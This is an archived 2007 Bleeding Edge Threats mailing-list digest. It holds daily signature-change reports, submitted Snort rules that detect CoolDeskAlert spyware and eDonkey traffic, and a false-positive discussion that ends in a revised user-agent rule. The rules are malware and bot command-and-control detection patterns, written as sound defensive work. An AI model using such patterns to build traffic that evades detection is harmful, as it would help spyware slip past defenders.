(bleeding.rules) 2003461 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet (bleeding.rules) [///] Modified active rules: [///] 2001809 - BLEEDING-EDGE P2P Limewire P2P UDP Traffic (bleeding-p2p.rules) 2002839 - BLEEDING-EDGE Malware My Search Spyware Config Download (bleeding-malware.rules) 2003392 - BLEEDING-EDGE TROJAN Warezov/Stration Communicating with Controller (bleeding-virus.rules) 2003428 - BLEEDING-EDGE MALWARE Surfaccuracy.com Spyware Install User-Agent (SF Installer) (bleeding-malware.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [---] Disabled rules: [---] 2003361 - BLEEDING-EDGE Malware My Search Spyware Config Download 2 (bleeding-malware.rules) 2003393 - BLEEDING-EDGE Malware My Search Spyware Config Download 3 (bleeding-malware.rules) [---] Removed rules: [---] 2404007 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 8) (bleeding-botcc.rules) 2405007 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 109 -> Added to bleeding-drop.rules (1): # VERSION 109 -> Added to bleeding-malware.rules (4): #by Matt Jonkman, from Spyware Listening Post data #Replaced by the above pcre #by Jacob Kitchel #by Matt Jonkman, from Spyware Listening Post data -> Added to bleeding-p2p.rules (2): #by Jeff Kell. Depth is correct, it's got 2 byte sway to compensate for 36 or 38 byte offset #Depth and offset added by Jeff Kell -> Added to bleeding-policy.rules (6): #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com -> Added to bleeding-sid-msg.map (25): 2003428 || BLEEDING-EDGE MALWARE Surfaccuracy.com Spyware Install User-Agent (SF Installer) 2003436 || BLEEDING-EDGE TROJAN Warezov/Stration Communicating with Controller 2 || url,www.avira.com/en/threats/section/fulldetails/id_vir/3242/tr_dldr.warezov.df.html || url,www.sophos.com/security/analyses/w32strationbo.html 2003437 || BLEEDING-EDGE P2P Ares over UDP 2003438 || BLEEDING-EDGE MALWARE Abcsearch.com Spyware Reporting 2003439 || BLEEDING-EDGE MALWARE Dropspam.com Spyware Install User-Agent (DSInstall) 2003440 || BLEEDING-EDGE MALWARE Dropspam.com Spyware Reporting 2003441 || BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent (wbi_v0.90) 2003442 || BLEEDING-EDGE MALWARE Webbuying.net Spyware Installing 2003444 || BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install Code Download 2003445 || BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install INI Download 2003446 || BLEEDING-EDGE MALWARE Adware Command Client Checkin || url,www.nuker.com/container/details/adware_command.php 2003447 || BLEEDING-EDGE MALWARE Humanclick.com Client Checkin 2003448 || BLEEDING-EDGE MALWARE Humanclick.com Client Update 2003449 || BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent 2 (wb v1.6.4) 2003450 || BLEEDING-EDGE MALWARE Specificclick.net Spyware Activity 2003451 || BLEEDING-EDGE MALWARE K8l.info Spyware Activity 2003452 || BLEEDING-EDGE MALWARE LoopAd/Secure-browser.com Spyware User-Agent (rw.exe) 2003453 || BLEEDING-EDGE POLICY Netvacy.com Anonymizing Proxy Access 2003454 || BLEEDING-EDGE POLICY Yahoo 360 Social Site Access 2003455 || BLEEDING-EDGE POLICY Hi5.com Social Site Access 2003456 || BLEEDING-EDGE POLICY Gazzag.com Social Site Access 2003457 || BLEEDING-EDGE POLICY Metacafe.com Social Site Access 2003458 || BLEEDING-EDGE POLICY Orkut.com Social Site Access 2003460 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet || url,doc.bleedingthreats.net/2003460 2003461 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet || url,doc.bleedingthreats.net/2003460 -> Added to bleeding-virus.rules (1): #Matt Jonkman, found by Jacob Kitchel -> Added to bleeding.rules (3): #So far unidentified bot and c&c channel. Working on it. These are crude sigs, # please let me know if you get hits. Need more information on this one. #Matt Jonkman [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 95 -> Removed from bleeding-drop.rules (1): # VERSION 95 -> Removed from bleeding-sid-msg.map (3): 2003428 || BLEEDING-EDGE MALWARE Surfaccuracy.com Spyware Install User-Agent (SF Installe) 2404007 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 8) || url,www.shadowserver.org 2405007 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from bleeding-virus.rules (1): #Matt Jonkman, found by axn jxn From axnjxnind at gmail.com Fri Mar 2 15:22:06 2007 From: axnjxnind at gmail.com (axn jxn) Date: Fri Mar 2 15:22:34 2007 Subject: [Bleeding-sigs] cooldeskalert spyware Message-ID: <5219f7470703020722k7e3a78a7n81387b9d5cbdce6a@mail.gmail.com> Here are a couple of sigs for CoolDeskAlert, which ties in to the cpvfeed ad network: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Install"; flow: to_server,established; uricontent:"/alert/get_xml"; content:"deskbar_id={"; nocase; reference:url,cooldeskalert.com; reference:url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html; classtype: trojan-activity; sid: ; rev:1; ) kind of generic, but there weren't any other user agents like this: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar)"; flow:to_server,established; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Toolbar/i"; classtype:trojan-activity; sid:; rev:1;) Jacob From jonkman at bleedingthreats.net Fri Mar 2 16:12:43 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Fri Mar 2 16:13:23 2007 Subject: [Bleeding-sigs] cooldeskalert spyware In-Reply-To: <5219f7470703020722k7e3a78a7n81387b9d5cbdce6a@mail.gmail.com> References: <5219f7470703020722k7e3a78a7n81387b9d5cbdce6a@mail.gmail.com> Message-ID: <45E84CFB.9030506@bleedingthreats.net> References and everything! Awesome. :) Thanks Jacob. Posting these now. Matt axn jxn wrote: > Here are a couple of sigs for CoolDeskAlert, which ties in to the > cpvfeed ad network: > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: > "BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Install"; flow: > to_server,established; uricontent:"/alert/get_xml"; > content:"deskbar_id={"; nocase; reference:url,cooldeskalert.com; > reference:url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html; > > classtype: trojan-activity; sid: ; rev:1; ) > > kind of generic, but there weren't any other user agents like this: > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS > (msg:"BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent > (Toolbar)"; flow:to_server,established; content:"User-Agent\:"; > nocase; pcre:"/User-Agent\:[^\n]+Toolbar/i"; > classtype:trojan-activity; sid:; rev:1;) > > Jacob > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Fri Mar 2 18:00:07 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Fri Mar 2 18:00:17 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070302180007.B51E522C088@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Fri Mar 2 18:00:07 2007 [***] [+++] Added rules: [+++] 2003462 - BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity (bleeding-malware.rules) 2003463 - BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others (bleeding-malware.rules) [///] Modified active rules: [///] 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 110 -> Added to bleeding-drop.rules (1): # VERSION 110 -> Added to bleeding-sid-msg.map (2): 2003462 || BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity || url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html || url,cooldeskalert.com 2003463 || BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 109 -> Removed from bleeding-drop.rules (1): # VERSION 109 From jonkman at bleedingthreats.net Mon Mar 5 15:04:16 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Mon Mar 5 15:04:46 2007 Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082 In-Reply-To: <200703051459.28464.thierry.chich@ac-clermont.fr> References: <200703051459.28464.thierry.chich@ac-clermont.fr> Message-ID: <45EC3170.2040000@bleedingthreats.net> This one can false on occasion, but shouldn't be that often, not in my experience at least. But I've not heard of anything headed to microsoft sites. Are you sure of what's on that box? Can you share the URL's that were being requested? The term Client as a user agent is VERY strange. The most unusual thing I've seen MS products use was "Microsoft Internet Explorer". Which unfortunately is used by several trojans and spyware packages. Also note: many trojans make a dummy request to microsoft.com to check connectivity and their ability to get to the internet. That's why I'd like to see the URLs... Anyone else seeing significant falses on this one of late? Lets move the rest of the conversation over to bleeding-sigs, I've cc'd that list. This is a bleeding rule. Matt Thierry CHICH wrote: > A lot of FP with rule 2002082: > > > /etc/snort/rules/bleeding-policy.rules:alert tcp $HOME_NET any -> > $EXTERNAL_NET $HTTP_PORTS (msg: "BLEEDING-EDGE POLICY Infotriever Spyware > User Agent"; flow: to_server,established; content:"User-Agent\: Client"; > nocase; classtype: trojan-activity; > reference:url,www.infotriever.com/Intro_SysAdmins.asp; sid: 2002082; rev:6;) > > For instance, I have FP from packet going to microsoft servers. I can't > believe that there could be spyware in microsoft products. It must be a false > positive. > > > For instance: > > > 10.163.234.246:33794 -> 207.68.179.219:80 [AP] > GET /_0sfdata/1?aa=5:18:58:03&ab=3806&ac=438&ad=134&ae=44&af=260&ag=211&ah=0&ai=51&aj=100&ak=1&al=36&nr=21&cg=%7 > bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d HTTP/1.0..User-Agent: Client..Host: > g.microsoft.com..Via: 1.1 localhost > .localdomain:8080 (squid/2.5.STABLE10)..X-Forwarded-For: 10.63.234.35, > 127.0.0.1..Cache-Control: max-age=259200. > .Connection: keep-alive.... > > I also join a pcap version of some packets. > > Thierry Chich > > > ------------------------------------------------------------------------ > > ????????D??" Host: g.microsoft.com > Via: 1.1 localhost.localdomain:8080 (squid/2.5.STABLE10) > X-Forwarded-For: 10.63.234.35, 127.0.0.1 > Cache-Control: max-age=259200 > Connection: keep-alive > > *??E?????D???'User-Agent: Client > Host: g.microsoft.com > Cookie: WT_FPC=id=194.254.206.115-673196624.29836356:lv=1170645054265:ss=1170673369265; MC1=GUID=cea72d125e26d643a94c506c4a94b44f&HASH=122d&LV=20071&V=3; msresearch=1 > Via: 1.1 localhost.localdomain:8080 (squid/2.5.STABLE10) > X-Forwarded-For: 192.168.224.2, 127.0.0.1 > Cache-Control: max-age=259200 > Connection: keep-alive > > h?E|? > ?@????D????User-Agent: Client > Host: g.microsoft.com > Cookie: WT_FPC=id=194.254.206.115-673196624.29836356:lv=1170645054265:ss=1170673369265; MC1=GUID=cea72d125e26d643a94c506c4a94b44f&HASH=122d&LV=20071&V=3; msresearch=1 > Via: 1.1 localhost.localdomain:8080 (squid/2.5.STABLE10) > X-Forwarded-For: 192.168.224.2, 127.0.0.1 > Cache-Control: max-age=259200 > Connection: keep-alive > > > > ------------------------------------------------------------------------ > > ------------------------------------------------------------------------- > Take Surveys. Earn Cash. Influence the Future of IT > Join SourceForge.net's Techsay panel and you'll get the chance to share your > opinions on IT & business topics through brief surveys-and earn cash > http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV > > > ------------------------------------------------------------------------ > > _______________________________________________ > Snort-sigs mailing list > Snort-sigs@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/snort-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From jonkman at bleedingthreats.net Mon Mar 5 23:40:32 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Mon Mar 5 23:40:59 2007 Subject: [Bleeding-sigs] Re: [Snort-sigs] revised edonkey sigs using flowbits In-Reply-To: <45ECA308.6090509@auckland.ac.nz> References: <45ECA308.6090509@auckland.ac.nz> Message-ID: <45ECAA70.701@bleedingthreats.net> Very nice Russel! I'll get these posted asap Matt Russell Fulton wrote: > HI Folks, > > I tweaked these two rules to first set and then check Flowbits: > > alert udp $HOME_NET 1024:65535 -> $EXTERNAL_NET 1024:65535 > (msg:"BLEEDING-EDGE P2P Edonkey udp IP Request"; dsize:4; content:"|e3 > 1b|"; depth:2; flowbits:set, edk.ip.requestect; flowbits:noalert; > classtype:policy-violation; > reference:url,www.giac.org/certified_professionals/practicals/gcih/0446.php; > sid:2013308; rev:1;) > alert udp $EXTERNAL_NET 1024:65535 -> $HOME_NET 1024:65535 > (msg:"BLEEDING-EDGE P2P Edonkey IP Transaction"; dsize:<20; content:"|e3 > 1c|"; depth:2; flowbits: isset, edk.ip.requestect; > classtype:policy-violation; > reference:url,www.giac.org/certified_professionals/practicals/gcih/0446.php; > sid:2013309; rev:1;) > > I then ran them along side the original and they detected all the replies. > > The rules need their sids unmangled and revs changed if they are to be > added to the distribution. Flowbits works fine with udp flows :) > > Russell > > ------------------------------------------------------------------------- > Take Surveys. Earn Cash. Influence the Future of IT > Join SourceForge.net's Techsay panel and you'll get the chance to share your > opinions on IT & business topics through brief surveys-and earn cash > http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV > _______________________________________________ > Snort-sigs mailing list > Snort-sigs@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/snort-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From thierry.chich at ac-clermont.fr Tue Mar 6 08:51:21 2007 From: thierry.chich at ac-clermont.fr (Thierry CHICH) Date: Tue Mar 6 16:11:04 2007 Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082 In-Reply-To: <45EC3170.2040000@bleedingthreats.net> References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45EC3170.2040000@bleedingthreats.net> Message-ID: <200703060951.21413.thierry.chich@ac-clermont.fr> Le lundi 5 mars 2007 16:04, vous avez ?crit : > This one can false on occasion, but shouldn't be that often, not in my > experience at least. But I've not heard of anything headed to microsoft > sites. > > Are you sure of what's on that box? Can you share the URL's that were > being requested? I am not sure of what do you mean exactly. I am seeing these packets coming from a lot of different computers, from different locations (I am snorting on a MAN). The url is given in the capture I gave: http://g.microsoft.com/_0sfdata/1 with a lot of parameters : for instance: ?aa=0:00:43:15&ab=269&ac=202&ad=3&ae=186&af=13&ag=100&ah=1&ai=8&aj=100&ak=0&al=5&nr=1&cg=%7bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d > When there is cookies, they are interesting : for instance: MC1=GUID=9133497a45a7b341862a5e06e0bad7a3&HASH=7a49&LV=20071&V=3 It seems thaht these cookies are pretty common in Microsoft Applications. It's look like the request for downloading codecs : http://www.tutorials-se.com/mediaplayer/mediaplayer-27.html > The term Client as a user agent is VERY strange. The most unusual thing > I've seen MS products use was "Microsoft Internet Explorer". Which > unfortunately is used by several trojans and spyware packages. I agree. > > Also note: many trojans make a dummy request to microsoft.com to check > connectivity and their ability to get to the internet. That's why I'd > like to see the URLs... > > Anyone else seeing significant falses on this one of late? I would be really astonished if it is a trojan and if I should be the only one with this kind of alerts. I have it on a lot of location. If it is spreading, it has already spread on the MAN I manage, and I could not understand why it wold not have spread elsewhere. > Lets move the rest of the conversation over to bleeding-sigs, I've cc'd > that list. This is a bleeding rule. Ok. > Matt Thierry From jonkman at bleedingthreats.net Tue Mar 6 16:20:19 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Tue Mar 6 16:22:08 2007 Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082 In-Reply-To: <200703060951.21413.thierry.chich@ac-clermont.fr> References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45EC3170.2040000@bleedingthreats.net> <200703060951.21413.thierry.chich@ac-clermont.fr> Message-ID: <45ED94C3.4090902@bleedingthreats.net> Thierry CHICH wrote: >> Are you sure of what's on that box? Can you share the URL's that were >> being requested? > > > I am not sure of what do you mean exactly. I am seeing these packets coming > from a lot of different computers, from different locations (I am snorting on > a MAN). The url is given in the capture I gave: > http://g.microsoft.com/_0sfdata/1 with a lot of parameters : > for > instance: ?aa=0:00:43:15&ab=269&ac=202&ad=3&ae=186&af=13&ag=100&ah=1&ai=8&aj=100&ak=0&al=5&nr=1&cg=%7bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d Hmmm. Maybe we need to just add: content:"Host\:"; nocase; content!"microsoft.com"; distance:0; nocase; Or better: pcre:!"/Host\: \S+\.microsoft\.com$/i"; >> The term Client as a user agent is VERY strange. The most unusual thing >> I've seen MS products use was "Microsoft Internet Explorer". Which >> unfortunately is used by several trojans and spyware packages. > > I agree. Anyone seeing hits on domains other than microsoft.com? Matt -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From jonkman at bleedingthreats.net Tue Mar 6 17:51:15 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Tue Mar 6 17:49:44 2007 Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082 In-Reply-To: <45ED94C3.4090902@bleedingthreats.net> References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45EC3170.2040000@bleedingthreats.net> <200703060951.21413.thierry.chich@ac-clermont.fr> <45ED94C3.4090902@bleedingthreats.net> Message-ID: <45EDAA13.30209@bleedingthreats.net> Further thought: How about this: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE POLICY Unusual User Agent (Client)"; flow:to_server,established; content:"User-Agent\: Client|0d 0a|"; nocase; content:!".microsoft.com|0d 0a|"; nocase; classtype: trojan-activity; reference:url,doc.bleedingthreats.net/2002082; sid:2002082; rev:7;) Posted for testing. Matt Matt Jonkman wrote: > Thierry CHICH wrote: >>> Are you sure of what's on that box? Can you share the URL's that were >>> being requested? >> >> I am not sure of what do you mean exactly. I am seeing these packets coming >> from a lot of different computers, from different locations (I am snorting on >> a MAN). The url is given in the capture I gave: >> http://g.microsoft.com/_0sfdata/1 with a lot of parameters : >> for >> instance: ?aa=0:00:43:15&ab=269&ac=202&ad=3&ae=186&af=13&ag=100&ah=1&ai=8&aj=100&ak=0&al=5&nr=1&cg=%7bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d > > Hmmm. Maybe we need to just add: > > content:"Host\:"; nocase; content!"microsoft.com"; distance:0; nocase; > > Or better: > > pcre:!"/Host\: \S+\.microsoft\.com$/i"; > > >>> The term Client as a user agent is VERY strange. The most unusual thing >>> I've seen MS products use was "Microsoft Internet Explorer". Which >>> unfortunately is used by several trojans and spyware packages. >> I agree. > > Anyone seeing hits on domains other than microsoft.com? > > > Matt > -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Tue Mar 6 18:00:07 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Tue Mar 6 18:00:13 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070306180007.1076322C0AA@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Tue Mar 6 18:00:07 2007 [***] [+++] Added rules: [+++] 2003464 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) (bleeding-attack_response.rules) 2003465 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) (bleeding-attack_response.rules) [///] Modified active rules: [///] 2002082 - BLEEDING-EDGE POLICY Unusual User Agent (Client) (bleeding-policy.rules) 2002383 - BLEEDING-EDGE SCAN Potential FTP Brute-Force attempt (bleeding-scan.rules) 2003308 - BLEEDING-EDGE P2P Edonkey IP Request (bleeding-p2p.rules) 2003309 - BLEEDING-EDGE P2P Edonkey IP Reply (bleeding-p2p.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 